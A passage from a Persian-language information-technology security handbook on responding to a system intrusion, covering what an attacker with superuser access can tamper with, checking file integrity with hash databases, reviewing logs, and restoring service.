‫ﺗﻐﻴﻴﺮ ﺩﺍﺩﻩ ﺑﺎﺷﺪ‪ .‬ﻣﻬﺎﺟﻢ ﻣﻤﻜﻦ ﺍﺳﺖ ﻧﺴﺨﻪﻫﺎﻱ ﺟﺪﻳﺪﻱ ﺍﺯ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺳﻴﺴﺘﻤﻲ ﺭﺍ ﻛﺎﻣﭙﺎﻳﻞ ﻭ ﺁﻧﻬﺎ ﺭﺍ ﺑﮕﻮﻧﻪﺍﻱ ﻧﺼﺐ ﻛـﺮﺩﻩ ﺑﺎﺷـﺪ ﻛـﻪ‬
‫ﻋﻠﻴﺮﻏﻢ ﺗﻐﻴﻴﺮﺍﺕ ﮔﺴﺘﺮﺩﻩ‪ ،‬ﺍﺑﺰﺍﺭﻫﺎﻱ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺷﻤﺎ ﺁﻧﻬﺎ ﺭﺍ ﮔﺰﺍﺭﺵ ﻧﺪﻫﻨﺪ‪ .‬ﻣﻬﺎﺟﻢ ﻣﻲﺗﻮﺍﻧﺪ ﺭﻭﻱ ﻫﺴﺘﺔ ﺳﻴـﺴﺘﻢﻋﺎﻣـﻞ ﺭﺍﻳﺎﻧـﻪ ﻭﺻـﻠﻪﺍﻱ‬
‫ﺍﻋﻤﺎﻝ ﻛﻨﺪ ﻛﻪ ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺷﻤﺎ ﺭﺍ ﻏﻴﺮﻓﻌﺎﻝ ﻧﻤﺎﻳﺪ‪ .‬ﻣﻬﺎﺟﻢ ﻫﻤﭽﻨﻴﻦ ﻣﻲﺗﻮﺍﻧﺪ ﺩﻳﺴﻚ ﺭﺍ ﺑﺼﻮﺭﺕ ﺧﺎﻡ ﺑﺮﺍﻱ ﺧﻮﺍﻧـﺪﻥ ﻳـﺎ ﻧﻮﺷـﺘﻦ‬
‫ﻻ ﺑﻪ ﻣﻬﺎﺭﺕ ﺧﺎﺻﻲ ﻧﻴﺎﺯ ﻧﺪﺍﺭﺩ‪ ،‬ﭼﺮﺍﻛﻪ ﻣﻬـﺎﺟﻢ ﺑﺮﺍﺣﺘـﻲ‬ ‫ﻣﺴﺘﻘﻴﻢ )ﺑﺪﻭﻥ ﺩﺧﺎﻟﺖ ﺳﻴﺴﺘﻢ ﻓﺎﻳﻞ( ﺑﺎﺯ ﻛﻨﺪ‪ .‬ﺟﺎﻟﺐ ﺁﻧﻜﻪ ﺍﻧﺠﺎﻡ ﻫﻤﺔ ﺍﻳﻨﻜﺎﺭﻫﺎ ﻣﻌﻤﻮ ﹰ‬
‫ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ‪rootkit‬ﻫﺎﻳﻲ ﻛﻪ ﺗﻮﺳﻂ ﺍﻓﺮﺍﺩ ﺑﺎ ﻣﻬﺎﺭﺕ ﺗﻬﻴﻪ ﺷﺪﻩﺍﻧﺪ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﺪ‪.‬‬
‫ﺗﻨﻬﺎ ﻣﺤﺪﻭﺩﻳﺖ ﺩﺭ ﻗﺪﺭﺕ ﻣﻬﺎﺟﻤﻲ ﻛﻪ ﺑﻪ ﻭﺿﻌﻴﺖ ﺍﺑﺮﻛﺎﺭﺑﺮ ﺩﺭﺁﻣﺪﻩ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻧﻤﻲﺗﻮﺍﻧﺪ ﭼﻴﺰﻫﺎﻳﻲ ﻛﻪ ﺭﻭﻱ ﻛﺎﻏﺬ ﭼﺎﭖ ﺷﺪﻩ ﺭﺍ ﺗﻐﻴﻴـﺮ‬
‫ﺦ ﺳﻴﺴﺘﻢ‪ ،‬ﻋﻤﻠﻴﺎﺕ ﺛﺒﺖ‬ ‫ﺩﻫﺪ‪ ،‬ﭼﺮﺍﻛﻪ ﺑﻪ ﺁﻥ ﺩﺳﺘﺮﺳﻲ ﻧﺪﺍﺭﺩ‪ .‬ﺑﻪ ﻫﻤﻴﻦ ﺩﻟﻴﻞ ﺍﮔﺮ ﺍﻣﻜﺎﻧﺎﺕ ﺛﺒﺘﻲ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺩﺍﺭﻳﺪ ﻛﻪ ﻫﻨﮕﺎﻡ ﺗﻐﻴﻴﺮﻳﺎﻓﺘﻦ ﺗﺎﺭﻳ ﹺ‬
‫ﺭﺍ ﺍﻧﺠﺎﻡ ﻣﻲﺩﻫﺪ‪ ،‬ﺛﺒﺘﻬﺎ ﺭﺍ ﺑﻪ ﻳﻚ ﭘﺎﻳﺎﻧﺔ ﭼﺎﭘﮕﺮ ﻳﺎ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺩﻳﮕﺮ ﻣﻨﺘﻘﻞ ﻛﻨﻴﺪ ﻭ ﺳﭙﺲ ﺁﻧﻬﺎ ﺭﺍ ﺑﻄﻮﺭ ﻣﻨﻈﻢ ﺑﺮﺭﺳﻲ ﻧﻤﺎﻳﻴﺪ‪.‬‬
‫ﺑﺮﺍﻱ ﺍﻳﻨﻜﻪ ﺧﻮﺩ ﺭﺍ ﺑﻴﺸﺘﺮ ﻣﺤﺎﻓﻈﺖ ﻛﺮﺩﻩ ﺑﺎﺷﻴﺪ ﺑﺎﻳﺪ ﻳﻚ ﻧﺴﺨﺔ ﻗﺎﺑﻞ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﺍﺯ ﺳﻴـﺴﺘﻢﻋﺎﻣـﻞ ﺧـﻮﺩ ﺭﻭﻱ ﻳـﻚ ﺩﻳـﺴﻚ ﻧـﻮﺭﻱ ﻳـﺎ‬
‫ﺩﻳﺴﻚ ﻓﺸﺮﺩﻩ ﻳﺎ ﻳﻚ ﻭﺳﻴﻠﺔ ﺫﺧﻴﺮﻩﺳﺎﺯﻱ ﻗﺎﺑﻞ ﺣﻤﻞ ﺩﻳﮕﺮ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ‪ .‬ﺩﺭ ﺍﻳﻨﺼﻮﺭﺕ ﺍﻣﻜـﺎﻥ ﺭﺍﻩﺍﻧـﺪﺍﺯﻱ ﻭ ﻭﺍﺭﺳـﻲ ﺳﻴـﺴﺘﻢ ﺧـﻮﺩ ﺑـﻪ‬
‫ﻛﻤﻚ ﺍﺑﺰﺍﺭﻫﺎﻳﻲ ﻛﻪ ﺍﺯ ﺳﻼﻣﺖ ﺁﻧﻬﺎ ﺍﻃﻤﻴﻨﺎﻥ ﺩﺍﺭﻳﺪ ﺭﺍ ﺑﻮﺟﻮﺩ ﺁﻭﺭﺩﻩﺍﻳﺪ‪ .‬ﺑﺎ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺩﺍﺷﺘﻦ ﻳﻚ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩ ﺍﺯ ﺧﻼﺻـﻪﻫـﺎﻱ ﺭﻣﺰﻧﮕـﺎﺭﻱ‬
‫ﻓﺎﻳﻠﻬﺎﻱ ﺩﺳﺖﻧﺨﻮﺭﺩﻩ‪ ٣٤٥‬ﻗﺎﺩﺭ ﺧﻮﺍﻫﻴﺪ ﺑﻮﺩ ﺗﻐﻴﻴﺮﺍﺕ ﻓﺎﻳﻠﻬﺎﻱ ﻣﻬﻢ ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﺭﺍ ﺗﺸﺨﻴﺺ ﺩﻫﻴﺪ؛ ﺑـﻪ ﺷـﺮﻃﻲ ﻛـﻪ ﺧﻼﺻـﻪﻫـﺎ ﺍﺯ ﺭﻭﻱ‬
‫ﻧﺴﺨﻪﻫﺎﻱ ﺩﺳﺘﻜﺎﺭﻱﻧﺸﺪﺓ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﺗﻮﻟﻴﺪ ﺷﺪﻩ ﺑﺎﺷﻨﺪ‪ .‬ﺑﻪ ﻳﺎﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﻟﺰﻭﻣﹰﺎ ﻧﻤﻲﺗﻮﺍﻧﻴﺪ ﺑﻪ ﭘﺸﺘﻴﺒﺎﻧﻬﺎﻱ ﺧﻮﺩ ﺍﻋﺘﻤﺎﺩ ﻛﻨﻴﺪ‪ ،‬ﭼـﻮﻥ‬
‫ﻧﻤﻲﺩﺍﻧﻴﺪ ﻧﻔﻮﺫ ﺍﺯ ﭼﻪ ﺯﻣﺎﻧﻲ ﺷﺮﻭﻉ ﺷﺪﻩ ﺍﺳﺖ‪ ،‬ﺍﻣﺎ ﺑﺮﺍﻱ ﻣﻘﺎﺑﻠﺔ ﻧﺴﺒﻲ ﺑﺎ ﺍﻳﻦ ﻧﮕﺮﺍﻧﻲ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ﺭﺳﺎﻧﻪﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥﮔﻴـﺮﻱ ﺗﻮﺯﻳـﻊﺷـﺪﻩ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴﺪ‪.‬‬

‫‪344 Loader‬‬
‫‪ ۳۴۵‬ﺑﺮﺍﻱ ﺍﻳﻦ ﻣﻨﻈﻮﺭ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ‪ tripwire‬ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ ﻳﺎ ﻳﻚ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺍﺧﺘﺼﺎﺻﻲ ﺧﻮﺩﺗﺎﻥ ﺭﺍ ﺗﻬﻴﻪ ﻧﻤﺎﻳﻴﺪ‪.‬‬
‫‪٤٣٩‬‬ ‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬

‫ﻗﺪﻡ ﺑﻌﺪﻱ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻳﻚ ﻧﺴﺨﺔ ﭼﺎﭘﻲ ﺍﺯ ﺗﻤﺎﻡ ﺛﺒﺘﻬﺎﻱ ﻻﺯﻣﻲ ﻛﻪ ﺩﺭ ﺩﺳﺘﺮﺱ ﺩﺍﺭﻳﺪ ﺗﻬﻴﻪ ﻛﻨﻴﺪ )ﻣﺜ ﹰﻼ ﺛﺒﺘﻬﺎﻱ ﺭﺍﻳﺎﻧﻪ ﻭ ﺷـﺒﻜﻪ(‪ ،‬ﻭ ﺁﻧﻬـﺎ ﺭﺍ‬
‫ﺑﺮﺭﺳﻲ ﻧﻤﺎﻳﻴﺪ ﺗﺎ ﺑﻔﻬﻤﻴﺪ ﻧﻔﻮﺫﮔﺮ ﭼﻪ ﻛﺎﺭﻫﺎﻱ ﻏﻴﺮﻣﺠﺎﺯﻱ ﺍﻧﺠﺎﻡ ﺩﺍﺩﻩ ﺍﺳﺖ‪ .‬ﻫﻤﭽﻨﻴﻦ ﺑﺎﻳـﺪ ﺑﻔﻬﻤﻴـﺪ ﻛـﻪ ﺁﻳـﺎ ﺍﺯ ﺯﻣـﺎﻥ ﻭﺭﻭﺩ ﻧﻔـﻮﺫﮔﺮ‪ ،‬ﺩﺭ‬
‫ﺳﻴﺴﺘﻢ ﺍﺗﻔﺎﻕ ﻏﻴﺮﻋﺎﺩﻱ ﺭﺥ ﺩﺍﺩﻩ ﻳﺎ ﺧﻴﺮ‪ .‬ﺍﻳﻦ ﺛﺒﺘﻬﺎ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺩﺭ ﻓﻬﻢ ﺍﻳﻨﻜﻪ ﻧﻔﻮﺫﮔﺮ ﭼﻪ ﺑﺮﻧﺎﻣﻪﻫﺎﻳﻲ ﺍﺟﺮﺍ ﻛﺮﺩﻩ ﻭ ﭼﻪ ﺍﻋﻤـﺎﻟﻲ ﺍﻧﺠـﺎﻡ ﺩﺍﺩﻩ‬
‫ﺍﺳﺖ ﺑﻪ ﺷﻤﺎ ﻛﻤﻚ ﻛﻨﻨﺪ‪ .‬ﻓﺮﺍﻣﻮﺵ ﻧﻜﻨﻴﺪ ﻛﻪ ﺑﺮﮔﻪﻫﺎﻱ ﭼﺎﭘﻲ ﺭﺍ ﺣﺘﻤﹰﺎ ﻳﻚ ﺑﻪ ﻳﻚ ﺗﺎﺭﻳﺦ ﻭ ﺍﻣﻀﺎ ﺑﺰﻧﻴﺪ‪.‬‬
‫ﺑﻪ ﺧﺎﻃﺮ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﺯﻣﺎﻥ ﻛﺸﻒ ﻳﻚ ﻧﻔﻮﺫ ﻟﺰﻭﻣﹰﺎ ﺯﻣﺎﻥ ﺷﺮﻭﻉ ﺁﻥ ﻧﻴﺴﺖ‪ .‬ﺩﺭ ﻳﻚ ﻣﻮﺭﺩ ﻧﻤﻮﻧﻪ‪ ،‬ﻣﺪﺍﺭﻙ ﻧﺸﺎﻥ ﺩﺍﺩﻧﺪ ﻛﻪ ﻧﻔﻮﺫ ﻭﺍﻗﻌـﻲ‬
‫ﺍﺯ ﺩﻭ ﺳﺎﻝ ﻗﺒﻞ ﺍﺯ ﻛﺸﻒ ﺷﺪﻥ ﺷﺮﻭﻉ ﺷﺪﻩ ﺑﻮﺩ! ﻃﺒﻴﻌﻲ ﺍﺳﺖ ﻛﻪ ﺑﻌﺪ ﺍﺯ ﺍﻳﻦ ﻣﺪﺕ ﻫﻴﭻ ﭘﺸﺘﻴﺒﺎﻥ ﻭ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻗﺎﺑﻞ ﺍﻋﺘﻤﺎﺩﻱ ﺭﻭﻱ ﺳﻴـﺴﺘﻢ‬
‫ﻭﺟﻮﺩ ﻧﺪﺍﺷﺖ‪ .‬ﺩﺭ ﻭﺍﻗﻊ ﻧﻔﻮﺫﮔﺮﺍﻥ ﺩﺭ ﻃﻮﻝ ﺍﻳﻦ ﻣﺪﺕ ﺗﻐﻴﻴﺮﺍﺕ ﺯﻳﺎﺩﻱ ﺩﺭ ﺳﻴﺴﺘﻢ ﻣﻲﺩﺍﺩﻧﺪ؛ ﺍﺯ ﺟﻤﻠﻪ ﻧﺼﺐ ﻭﺻﻠﻪﻫﺎ ﻭ ﺍﺭﺗﻘﺎﻫﺎ! ﺩﺭ ﺍﻳﻦ ﻣﻮﺭﺩ‬
‫ﻣﻲﺗﻮﺍﻥ ﮔﻔﺖ ﻧﻔﻮﺫﮔﺮﺍﻥ ﻛﺎﺭ ﺭﺍﻫﺒﺮﻱ ﺭﺍ ﺑﻬﺘﺮ ﺍﺯ ﻣﺴﺌﻮﻝ ﻳﺎ ﻣﺴﺌﻮﻟﻴﻦ ﺁﻥ ﺍﻧﺠﺎﻡ ﻣﻲﺩﺍﺩﻧﺪ!‬

‫ﺷﺮﻭﻉ ﻣﺠﺪﺩ ﻛﺎﺭ‬


‫ﮔﺎﻡ ﺑﻌﺪﻱ ﺩﺭ ﺭﺳﻴﺪﮔﻲ ﺑﻪ ﻳﻚ ﻧﻔﻮﺫ‪ ،‬ﺑﺎﺯﮔﺮﺩﺍﻧﺪﻥ ﺳﻴﺴﺘﻢ ﺑﻪ ﺣﺎﻟﺖ ﻛﺎﺭﻱ ﺍﺳﺖ‪ .‬ﺍﻳﻨﻜﻪ ﺑﺎ ﭼﻪ ﺳﺮﻋﺘﻲ ﺑﺎﻳـﺪ ﻛـﺎﺭ ﺭﺍ ﺁﻏـﺎﺯ ﻛﻨﻴـﺪ‪ ،‬ﻭ ﺩﺭ ﺩﺭﺍﺯ‬
‫ﻣﺪﺕ ﻗﺼﺪ ﺩﺍﺭﻳﺪ ﭼﻪ ﻛﺎﺭﻱ ﺩﺭ ﻣﻮﺭﺩ ﺍﻳﻦ ﻧﻔﻮﺫ ﺍﻧﺠﺎﻡ ﺩﻫﻴﺪ‪ ،‬ﺗﻌﻴﻴﻦﻛﻨﻨﺪﺓ ﺯﻣﺎﻥ ﻭ ﭼﮕﻮﻧﮕﻲ ﺍﻧﺠﺎﻡﺷﺪﻥ ﺍﻳﻦ ﮔﺎﻡ ﻫﺴﺘﻨﺪ‪.‬‬
‫ﺣﺪﺍﻗﻞ ﻛﺎﺭﻱ ﻛﻪ ﺑﺎﻳﺪ ﺍﻧﺠﺎﻡ ﺷﻮﺩ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻴﺪ ﺗﻤﺎﻡ ﺻﺪﻣﺎﺕ ﻭﺍﺭﺩﻩ ﺭﺍ ﺗﺮﻣﻴﻢ ﻛﺮﺩﻩ ﻭ ﺁﻥ ﻧﻘﺎﻳﺼﻲ ﻛـﻪ ﺑـﻪ ﻣﻬـﺎﺟﻢ‬
‫ﺍﺟﺎﺯﺓ ﻭﺭﻭﺩ ﺩﺍﺩﻩﺍﻧﺪ ﺭﺍ ﺍﺯ ﺑﻴﻦ ﺑﺮﺩﻩﺍﻳﺪ‪ .‬ﭘﺲ ﺍﺯ ﺁﻥ ﭼﻨﺎﻧﭽﻪ ﺑﺪﺭﺳﺘﻲ ﭘﺸﺘﻴﺒﺎﻥ ﮔﺮﻓﺘﻪ ﺑﺎﺷﻴﺪ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺳﻴﺴﺘﻢ ﺭﺍ ﺑﻪ ﺣﺎﻟﺖ ﻛﺎﺭﻱ ﺑﺎﺯﮔﺮﺩﺍﻧﻴﺪ‪.‬‬
‫ﺗﺸﺨﻴﺺ ﺍﻳﻨﻜﻪ ﭼﻪ ﭼﻴﺰﻱ ﺑﺎﻋﺚ ﺷﺪﻩ ﻣﻬﺎﺟﻢ ﺍﺟﺎﺯﻩ ﻭﺭﻭﺩ ﭘﻴﺪﺍ ﻛﻨﺪ ﻣﺸﻜﻞ ﺍﺳﺖ‪ ،‬ﭼﺮﺍﻛـﻪ ﺩﺭ ﺛﺒﺘﻬـﺎ ﺩﺍﺩﻩﻫـﺎﻱ ﻧـﺎﭼﻴﺰﻱ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ﻛـﻪ‬
‫ﻧﺸﺎﻧﺪﻫﺪﺓ ﻣﺎﻭﻗﻊ ﺑﺎﺷﻨﺪ ﻭ ﺍﺑﺰﺍﺭ ﺗﻮﺍﻧﻤﻨﺪﻱ ﻧﻴﺰ ﺩﺭ ﺩﺳﺖ ﻧﻴﺴﺖ ﻛﻪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻥ ﺑﺘﻮﺍﻥ ﻧﻔﻮﺫ ﺭﺍ ﻣﻬﻨﺪﺳﻲ ﻣﻌﻜﻮﺱ ﻛﺮﺩ‪ .‬ﺑﻨﻈـﺮ ﻣـﻲﺭﺳـﺪ‬
‫ﺑﻴﺸﺘﺮ ﻧﻔﻮﺫﻫﺎ ﻧﺘﻴﺠﺔ ﺍﺷﻜﺎﻻﺕ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﻭ ﺩﺭ ﻣﻮﺍﺭﺩ ﻛﻤﺘﺮﻱ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻣﺴﺮﻭﻗﺔ ﻛﺎﺭﺑﺮﺍﻥ ﺑﺎﺷﻨﺪ‪) .‬ﺣﺘﻤﹰﺎ ﺍﻣﻜﺎﻥ ﺩﺯﺩﻳﺪﻩﺷﺪﻥ ﺭﻣﺰﻫﺎﻱ ﻋﺒـﻮﺭ‬
‫ﺭﺍ ﺩﺭ ﻧﻈﺮ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ‪ ،‬ﺧﺼﻮﺻﹰﺎ ﺍﮔﺮ ﻣﻲﺑﻴﻨﻴﺪ ﻧﻔﻮﺫﮔﺮﺍﻥ ﺭﻭﻱ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﺩﻳﺪﻩﺑﺎﻥ ﺗﺮﺍﻓﻴﻚ ﻧﺼﺐ ﻛﺮﺩﻩﺍﻧﺪ‪(.‬‬
‫ﺍﮔﺮ ﻧﻔﻮﺫ ﺍﺯ ﻳﻚ ﺍﺷﻜﺎﻝ ﻧﺎﺷﻲ ﺷﻮﺩ ﻣﻤﻜﻦ ﺍﺳﺖ ﻛﺸﻒ ﺁﻥ ﺑﺮﺍﻱ ﺷﻤﺎ ﺩﺷﻮﺍﺭ ﺑﺎﺷﺪ‪ ،‬ﺑﺨﺼﻮﺹ ﺍﮔﺮ ﺍﺷﻜﺎﻝ ﺟﺪﻳﺪﻱ ﺑﺎﺷﺪ ﻛﻪ ﻫﻨـﻮﺯ ﺑﻄـﻮﺭ‬
‫ﮔﺴﺘﺮﺩﻩ ﻣﻮﺭﺩ ﺑﻬﺮﻩﺑﺮﺩﺍﺭﻱ ﻗﺮﺍﺭ ﻧﮕﺮﻓﺘﻪ ﺍﺳﺖ‪ .‬ﺩﺭ ﺍﻳﻦ ﻣﻮﺭﺩ ﭼﻨﺪ ﭘﻴﺸﻨﻬﺎﺩ ﺩﺍﺭﻳﻢ‪:‬‬
‫ﺍﮔﺮ ﺗﺮﺍﻓﻴﻚ ﺷﺒﻜﺔ ﺧﻮﺩ ﺭﺍ ﺫﺧﻴﺮﻩ ﻛﺮﺩﻩﺍﻳﺪ‪ ،‬ﺑﺎ ﺳﻴﺴﺘﻢ ﺗﺤﻠﻴﻞ ﺧﻮﺩ ﺁﻧﺮﺍ ﻭﺍﺭﺳﻲ ﻛﻨﻴﺪ ﺗﺎ ﺑﺒﻴﻨﻴﺪ ﺁﻳﺎ ﻫـﻴﭻ ﻗـﺴﻤﺖ ﺁﻥ ﻧﺎﻣـﺄﻧﻮﺱ ﻭ ﻳـﺎ‬ ‫‪.١‬‬
‫ﻏﻴﺮﻗﺎﺑﻞ ﺗﻮﺟﻴﻪ ﺍﺳﺖ ﻳﺎ ﺧﻴﺮ؛‬
‫ﺩﺭ ﻓﺎﻳﻠﻬﺎﻱ ﺛﺒﺖ ﺧﻮﺩ ﺑﺪﻧﺒﺎﻝ ﻣﻮﺍﺭﺩ ﻏﻴﺮﻋﺎﺩﻱ‪ ،‬ﺍﻟﮕﻮﻫﺎﻱ ﻓﻌﺎﻟﻴﺘﻲ ﻏﻴﺮﻣﻌﻤﻮﻝ‪ ،‬ﻳﺎ ﻣﺪﺍﺭﻛﻲ ﺩﺍﻝ ﺑﺮ ﺧﺮﺍﺏ ﺷﺪﻥ ﺑﺮﻧﺎﻣﻪﻫﺎ ﺑﮕﺮﺩﻳﺪ؛ ﻭ‬ ‫‪.٢‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬

‫ﺍﮔﺮ ﺁﺩﺭﺱ ‪ IP‬ﺧﺎﺻﻲ ﺭﺍ ﻛﻪ ﻣﻬﺎﺟﻢ ﺑﻌﻨﻮﺍﻥ ﻣﺒﺪﺃ ﺣﻤﻠﻪ ﺑﻜﺎﺭ ﺑﺮﺩﻩ ﻣﻲﺩﺍﻧﻴﺪ‪ ،‬ﺩﺭ ﺗﻤﺎﻡ ﻓﺎﻳﻠﻬﺎﻱ ﺛﺒﺖ ﺧﻮﺩ ﺑـﺪﻧﺒﺎﻝ ﻳـﺎﻓﺘﻦ ﺳـﻮﺍﺑﻖ ﺁﻥ‬ ‫‪.٣‬‬
‫ﺁﺩﺭﺱ ﺑﺎﺷﻴﺪ‪.‬‬
‫ﺍﮔﺮ ﻣﺸﻜﻮﻙ ﺑﻪ ﺍﻳﻦ ﻫﺴﺘﻴﺪ ﻛﻪ ﺍﺷﻜﺎﻟﻲ ﺩﺭ ﻳﻚ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺳﻴﺴﺘﻤﻲ ﺑﺎﻋﺚ ﻧﻔﻮﺫ ﺷﺪﻩ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﺮﺍﻱ ﻣﺸﻮﺭﺕ ﺑـﺎ ﺗﻮﻟﻴﺪﻛﻨﻨـﺪﺓ ﺁﻥ ﺗﻤـﺎﺱ‬
‫ﻻ ﺭﺍﻩﺣﻠﻲ ﺑﺮﺍﻱ ﻣﺸﻜﻠﻬﺎﻱ ﺭﺍﻳﺞ ﺩﺍﺭﻧﺪ‪ .‬ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﻣﻮﺍﺭﺩ ﺍﮔﺮ ﻗﺮﺍﺭﺩﺍﺩ ﺷﻤﺎ ﺑﺎ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﺷﺎﻣﻞ ﭘﺸﺘﻴﺒﺎﻧﻲ ﭘـﺲ‬
‫ﺑﮕﻴﺮﻳﺪ؛ ﭼﺮﺍﻛﻪ ﺁﻧﻬﺎ ﻣﻌﻤﻮ ﹰ‬
‫ﺍﺯ ﻓﺮﻭﺵ ﻫﻢ ﺑﺸﻮﺩ ﻭ ﻳﺎ ﺷﻤﺎ ﻳﻚ ﻣﺸﺘﺮﻱ ﻋﻤﺪﺓ ﺁﻧﻬﺎ ﺑﺎﺷﻴﺪ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ﻗﺒﻞ ﺑﻪ ﻧﺘﻴﺠﻪﺑﺨﺶ ﺑﻮﺩﻥ ﺍﻳﻦ ﺗﻤﺎﺱ ﺍﻣﻴﺪﻭﺍﺭ ﺑﺎﺷﻴﺪ‪.‬‬

‫ﻻ ﺁﺳﻴﺐﭘـﺬﻳﺮﻳﻬﺎﻱ ﺟﺪﻳـﺪ‬ ‫ﻣﻲﺗﻮﺍﻧﻴﺪ ﻧﮕﺎﻫﻲ ﻧﻴﺰ ﺑﻪ ﻣﻄﺎﻟﺐ ﺟﺪﻳﺪ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ ﻭ ﻓﻬﺮﺳﺘﻬﺎﻱ ﭘﺴﺘﻲ ﮔﺮﻭﻫﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺑﻴﺎﻧﺪﺍﺯﻳﺪ‪ .‬ﻣﻌﻤﻮ ﹰ‬
‫ﺩﺭ ﺍﻳﻦ ﻣﻜﺎﻧﻬﺎ ﺑﺎ ﺟﺰﺋﻴﺎﺕ ﺯﻳﺎﺩﻱ ﻣﻮﺭﺩ ﺑﺤﺚ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ‪ .‬ﺩﺭ ﺑﺮﺧﻲ ﻣﻮﺍﺭﺩ ﻧﻴﺰ ﭘﻴﺶ ﻣﻲﺁﻳﺪ ﻛﻪ ﺍﻃﻼﻋﺎﺕ ﺩﺭﻭﻥ ﺍﻳﻦ ﭘﺎﻳﮕﺎﻫﻬﺎ ﺍﺷﺘﺒﺎﻩ ﻳـﺎ‬
‫ﺧﻄﺮﻧﺎﻙ ﻫﺴﺘﻨﺪ؛ ﻭ ﺑﻨﺎﺑﺮﺍﻳﻦ ﺑﺴﻴﺎﺭ ﻣﺮﺍﻗﺐ ﺁﻧﭽﻪ ﻛﻪ ﻣﻲﺧﻮﺍﻧﻴﺪ ﺑﺎﺷﻴﺪ‪.‬‬
‫ﻻ ﺩﻳﺪ ﺧﻮﺑﻲ ﻧـﺴﺒﺖ ﺑـﻪ ﻧﻔﻮﺫﻫـﺎﻱ‬ ‫ﺩﺭ ﻧﻬﺎﻳﺖ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺨﻮﺍﻫﻴﺪ ﺑﺎ ﻳﻚ ﺗﻴﻢ ﺧﻮﺏ ‪ FIRST‬ﺗﻤﺎﺱ ﺑﮕﻴﺮﻳﺪ‪ .‬ﺗﻴﻤﻬﺎﻱ ‪ FIRST‬ﻣﻌﻤﻮ ﹰ‬
‫ﺟﺪﻳﺪ ﺩﺍﺭﻧﺪ‪ ،‬ﻛﻪ ﺩﻟﻴﻞ ﻋﻤﺪﺓ ﺁﻥ ﮔﺰﺍﺭﺷﻬﺎﻱ ﺯﻳﺎﺩ ﺩﺭﻳﺎﻓﺘﻲ ﺁﻧﻬﺎ ﺍﺳﺖ‪ .‬ﺩﺭ ﺗﻤﺎﺱ ﺑﻮﺩﻥ ﺑﺎ ﻧﻤﺎﻳﻨﺪﺓ ﻳﻜﻲ ﺍﺯ ﺍﻳﻦ ﺗﻴﻤﻬﺎ ﻣﻲﺗﻮﺍﻧﺪ ﻧﺘـﺎﻳﺞ ﺧـﻮﺑﻲ‬
‫ﺑﻪ ﻫﻤﺮﺍﻩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻭ ﺩﺭ ﻣﻮﺭﺩ ﺍﻳﻨﻜﻪ ﭼﻪ ﭼﻴﺰﻫﺎﻳﻲ ﺭﺍ ﺑﺎﻳﺪ ﻗﺒﻞ ﺍﺯ ﺑﺎﺯﮔﺮﺩﺍﻧﺪﻥ ﺳﻴﺴﺘﻢ ﺑﻪ ﻛﺎﺭ ﻭﺍﺭﺳـﻲ ﻛﻨﻴـﺪ ﺑـﺮﺍﻱ ﺷـﻤﺎ ﺭﺍﻫﻨﻤﺎﻳﻴﻬـﺎﻱ‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٤٤٠‬‬

